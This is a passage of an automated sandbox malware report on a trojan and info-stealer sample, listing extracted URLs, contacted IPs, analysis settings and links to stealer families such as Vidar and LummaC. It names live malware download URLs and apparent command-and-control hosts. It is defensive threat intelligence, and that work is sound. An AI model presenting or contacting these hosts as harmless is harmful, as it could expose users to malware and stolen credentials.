                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28bkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.pngkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://outlook.com_explorer.exe, 00000001.00000000.1697094973.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesBFCFBF.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/aFXF441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://65.109.242.59/vcruntime140.dll/kat796E.tmp, 00000009.00000002.2826699308.00000000008BD000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://whispedwoodmoodsksl.shop/B9EF441.exe, 00000006.00000003.2351445526.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://help.steampowered.com/en/kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://schemas.microexplorer.exe, 00000001.00000000.1694112047.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1693681888.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1695682915.0000000009B60000.00000002.00000001.00040000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://recaptcha.net/recaptcha/;kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://broadcast.st.dl.eccdnx.comkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gifkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?vkat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://x1.c.lencr.org/0F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://x1.i.lencr.org/0F441.exe, 00000006.00000003.2102003099.0000000002C92000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/workshop/kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://login.steampowered.com/kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/profiles/76561199689717899/badgeskat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://support.mozilla.org/products/firefoxgro.allF441.exe, 00000006.00000003.2104123023.0000000002DA2000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/legal/kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2410519110.000000000088B000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000001.00000000.1692944152.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://65.109.242.5976561199689717899[1].htm.9.drfalse
                  • 7%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=enkat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2823531512.000000000043C000.00000040.00000400.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown
                  https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpgkat796E.tmp, 00000009.00000002.2826699308.0000000000933000.00000004.00000020.00020000.00000000.sdmp, HCFIII.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoF441.exe, 00000006.00000003.2067018941.0000000002CAF000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067504302.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, F441.exe, 00000006.00000003.2067743271.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2549123812.000000000094C000.00000004.00000020.00020000.00000000.sdmp, IDHIDB.9.drfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://65.109.242.59/NXkat796E.tmp, 00000009.00000003.2442796104.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008CC000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://rpi.net.au/~ajohnson/resourcehacker9EDA.exe, 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000000.2358201708.00000000004B4000.00000002.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://store.steampowered.com/76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown
                  http://127.0.0.1:27060kat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://steamcommunity.com/profiles/76561199689717899tSkat796E.tmp, 00000009.00000003.2378217095.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000001.00000000.1692944152.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1kat796E.tmp, 00000009.00000003.2561219190.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2548139998.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2393803566.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2378217095.0000000000895000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2442796104.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2537240688.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2569509990.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2409918117.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000002.2826699308.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, kat796E.tmp, 00000009.00000003.2426326112.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.9.drfalse
                  • URL Reputation: safe
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  23.145.40.124
                  		unknownReserved
                  		22631SURFAIRWIRELESS-IN-01UStrue
                  104.102.42.29
                  		steamcommunity.comUnited States
                  		16625AKAMAI-ASUStrue
                  188.114.96.3
                  		whispedwoodmoodsksl.shopEuropean Union
                  		13335CLOUDFLARENETUStrue
                  185.18.245.58
                  		unknownAzerbaijan
                  		39232UNINETAZtrue
                  185.235.137.54
                  		unknownIran (ISLAMIC Republic Of)
                  		202391AFRARASAIRfalse
                  65.109.242.59
                  		unknownUnited States
                  		11022ALABANZA-BALTUSfalse
                  91.202.233.231
                  		unknownRussian Federation
                  		9009M247GBtrue
                  190.28.110.209
                  		dbfhns.inColombia
                  		13489EPMTelecomunicacionesSAESPCOtrue
                  45.129.96.86
                  		unknownEstonia
                  		208440GMHOST-EEtrue

                  General Information

                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1447651
                  Start date and time:2024-05-26 10:21:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 12m 34s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:16
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:4.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@14/35@7/9
                  EGA Information:
                  • Successful, ratio: 80%
                  HCA Information:
                  • Successful, ratio: 96%
                  • Number of executed functions: 65
                  • Number of non-executed functions: 243
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Override analysis time to 240000 for current running targets taking high CPU consumption

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.42.65.92
                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, 6.d.a.8.b.e.f.b.0.0.0.0.0.0.0.0.4.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target kat796E.tmp, PID 6620 because there are no executed function
                  • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • Not all processes where analyzed, report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Report size getting too big, too many NtEnumerateKey calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtOpenKey calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  04:22:00API Interceptor466341x Sleep call for process: explorer.exe modified
                  04:22:34API Interceptor8x Sleep call for process: F441.exe modified
                  04:23:16API Interceptor1x Sleep call for process: kat796E.tmp modified
                  04:23:25API Interceptor1x Sleep call for process: WerFault.exe modified
                  09:22:21Task SchedulerRun new task: Firefox Default Browser Agent 3D6E4885768EAFE0 path: C:\Users\user\AppData\Roaming\sdveeeu

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  104.102.42.29http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                    file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                      file.exeGet hashmaliciousVidarBrowse
                        CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                          https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                            https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                              file.exeGet hashmaliciousVidarBrowse
                                mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                                  file.exeGet hashmaliciousVidarBrowse
                                    BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                      188.114.96.3http://worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.icoGet hashmaliciousHTMLPhisherBrowse
                                      • worker-quiet-cherry-3fda.cbb2856.workers.dev/favicon.ico
                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                      • fleur-de-lis.sbs/jhgfd
                                      KT-L068310.exeGet hashmaliciousFormBookBrowse
                                      • www.barrettdigitalart.com/i319/
                                      http://cfg3xe.pages.dev/Get hashmaliciousUnknownBrowse
                                      • cfg3xe.pages.dev/
                                      http://amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/Get hashmaliciousUnknownBrowse
                                      • amht38eh3e3f98ox0ld1rc4h3fjcowz98ldjp5hek8.pages.dev/
                                      G5N0mtxJLN.exeGet hashmaliciousLokibotBrowse
                                      • rocheholding.top/evie3/five/fre.php
                                      Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • qr-in.com/YXcuqXy
                                      LHER000698175.xlsGet hashmaliciousUnknownBrowse
                                      • qr-in.com/JeYCrvM
                                      QUOTATION_MAYQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                      • filetransfer.io/data-package/sy8hP76i/download
                                      Purchase Order # PO-00159.xla.xlsxGet hashmaliciousUnknownBrowse
                                      • qr-in.com/YXcuqXy
                                      185.18.245.58file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                      • sdfjhuz.com/dl/buildz.exe
                                      185.235.137.542WG7HEj7mc.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe
                                      TrBsSxexUi.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe
                                      JuqFxYIfSi.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe
                                      o8JAdiyezt.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe
                                      4m8RBorBUl.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe
                                      rU53IkLA9a.exeGet hashmaliciousLummaCBrowse
                                      • 185.235.137.54/file/host_so.exe

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      whispedwoodmoodsksl.shopa6lzHWp4pa.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                                      • 104.21.77.72
                                      2WG7HEj7mc.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      TrBsSxexUi.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      JuqFxYIfSi.exeGet hashmaliciousLummaCBrowse
                                      • 188.114.96.3
                                      91trXZr1Ts.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.77.72
                                      j6W8OF1uLO.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.77.72
                                      0CmMweT4Wf.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.205.94
                                      TePd86X60h.exeGet hashmaliciousLummaCBrowse
                                      • 104.21.77.72
                                      jHLijDfFFA.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.205.94
                                      fP52Wp1GYY.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.205.94
                                      steamcommunity.comfile.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                      • 23.210.122.61
                                      https://bitly.cx/LmuIzGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
                                      https://steamcomnumitly.com/get/spring/afaFJ4a/50Get hashmaliciousUnknownBrowse
                                      • 23.67.133.187
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      mQPyKe8cqn.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                      • 23.67.133.187
                                      SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 23.199.218.33

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUSQN5PrDr5St.elfGet hashmaliciousUnknownBrowse
                                      • 8.6.157.57
                                      boost.exeGet hashmaliciousNovaSentinelBrowse
                                      • 104.21.55.141
                                      SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.decompression.bomb.26030.10641.exeGet hashmaliciousUnknownBrowse
                                      • 104.21.46.8
                                      wtrD6RiHlm.exeGet hashmaliciousRedLineBrowse
                                      • 172.67.19.24
                                      n4WgIM7VfS.elfGet hashmaliciousMiraiBrowse
                                      • 1.8.124.113
                                      https://newsklikdisini5bekbg0.3bsz4.xyz/Get hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      https://steamcomunmnity.com/app/1648413/STALKER_2_Heert_of_ChornobylGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      http://t.service.isuzucoco.com/t.aspx/subid/169037213/camid/1623402/linkid/321020/Default.aspxGet hashmaliciousUnknownBrowse
                                      • 104.19.144.242
                                      UNINETAZhttp://www.lnkfi.re/1moJNQoc/Get hashmaliciousUnknownBrowse
                                      • 37.27.108.55
                                      1.exeGet hashmaliciousPureLog StealerBrowse
                                      • 185.18.245.58
                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                      • 185.18.245.58
                                      CGemi3cruu.elfGet hashmaliciousMiraiBrowse
                                      • 37.26.35.135
                                      ODggSYsZP2.elfGet hashmaliciousUnknownBrowse
                                      • 37.27.14.174
                                      240506-b7lv1sfmcw_pw_infected.zipGet hashmaliciousXmrigBrowse
                                      • 37.27.107.122
                                      0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                      • 37.27.87.155
                                      file.exeGet hashmaliciousLummaC, PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                      • 37.27.87.155
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 37.27.87.155
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 37.27.87.155
                                      SURFAIRWIRELESS-IN-01USjew.x86.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.58.16
                                      4glhPVAaxw.exeGet hashmaliciousUnknownBrowse
                                      • 23.145.40.122
                                      4glhPVAaxw.exeGet hashmaliciousUnknownBrowse
                                      • 23.145.40.122
                                      wsWcTw2vNt.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.34.49
                                      q3K2TwLiUh.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.34.37
                                      WYA25FYPq8.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.34.36
                                      DUGEn9I0cO.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.34.35
                                      RQbg1N3Jd5.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.34.54
                                      bjSUNxvdgR.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.58.62
                                      PZlaRrmcFG.elfGet hashmaliciousMiraiBrowse
                                      • 23.145.58.10
                                      AKAMAI-ASUShgVOQGUGqk.elfGet hashmaliciousUnknownBrowse
                                      • 104.71.4.13
                                      mKBZo65Fcb.elfGet hashmaliciousMiraiBrowse
                                      • 23.216.221.197
                                      c0jeXEeVbR.elfGet hashmaliciousMiraiBrowse
                                      • 23.48.239.166
                                      http://surl.pk/rUrcXGet hashmaliciousUnknownBrowse
                                      • 2.19.126.198
                                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                      • 104.102.42.29
                                      la.bot.mips.elfGet hashmaliciousUnknownBrowse
                                      • 23.36.242.165
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 104.102.42.29
                                      CHA0VZiz8y.exeGet hashmaliciousCryptOne, Djvu, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, VidarBrowse
                                      • 104.102.42.29
                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                      • 23.210.122.61
                                      VWOm7n5MsV.elfGet hashmaliciousUnknownBrowse
                                      • 23.74.215.189

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                      • 188.114.96.3
                                      YvF8xPbiml.exeGet hashmaliciousRisePro StealerBrowse
                                      • 188.114.96.3
                                      swift.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      NFs_468.msiGet hashmaliciousVMdetectBrowse
                                      • 188.114.96.3
                                      XVM5nluelx.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                      • 188.114.96.3
                                      https://proviaproducts-my.sharepoint.com/:b:/g/personal/bob_rossi_provia_com/EadoUKaCx_pLpRRZlPhQBbkBX2-aayjJ2XxHM4MjJFfXkA?e=7rg6fPGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      file.exeGet hashmaliciousBabuk, Djvu, SmokeLoaderBrowse
                                      • 188.114.96.3
                                      Updated-IT1_Individual_Resident_Return_XLS-18.0.9-2024.xls.xlsGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                      • 188.114.96.3
                                      IT1_Individual_Resident_Return_XLS.zipGet hashmaliciousUnknownBrowse
                                      • 188.114.96.3
                                      51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                      • 65.109.242.59
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      jE4zclRJU2.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      SecuriteInfo.com.Win64.Evo-gen.30302.14698.exeGet hashmaliciousCryptOne, Djvu, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                      • 65.109.242.59
                                      SecuriteInfo.com.Win32.Malware-gen.198.6512.exeGet hashmaliciousPureLog Stealer, VidarBrowse
                                      • 65.109.242.59
                                      BI6oo9z4In.exeGet hashmaliciousCryptOne, Djvu, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                      • 65.109.242.59
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      file.exeGet hashmaliciousVidarBrowse
                                      • 65.109.242.59
                                      37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                      • 104.102.42.29
                                      SecuriteInfo.com.Trojan.Win32.Scar.tbxu.16998.26344.exeGet hashmaliciousUnknownBrowse
                                      • 104.102.42.29
